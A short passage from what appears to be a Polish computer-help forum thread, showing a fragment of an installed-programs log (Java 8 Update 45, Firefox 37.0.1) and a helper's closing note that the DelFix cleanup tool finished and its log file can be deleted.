Linki również podane w w/w odnośniku. ==================== Zainstalowane programy ====================== Java 8 Update 45 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86418045F0}) (Version: 8.0.450 - Oracle Corporation) Java 8 Update 45 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218045F0}) (Version: 8.0.450 - Oracle Corporation) Mozilla Firefox 37.0.1 (x86 pl) (HKLM-x32\...\Mozilla Firefox 37.0.1 (x86 pl)) (Version: 37.0.1 - Mozilla)

DelFix wykonał robotę. Skasuj plik C:\delfix.txt z dysku. Temat rozwiązany. Zamykam.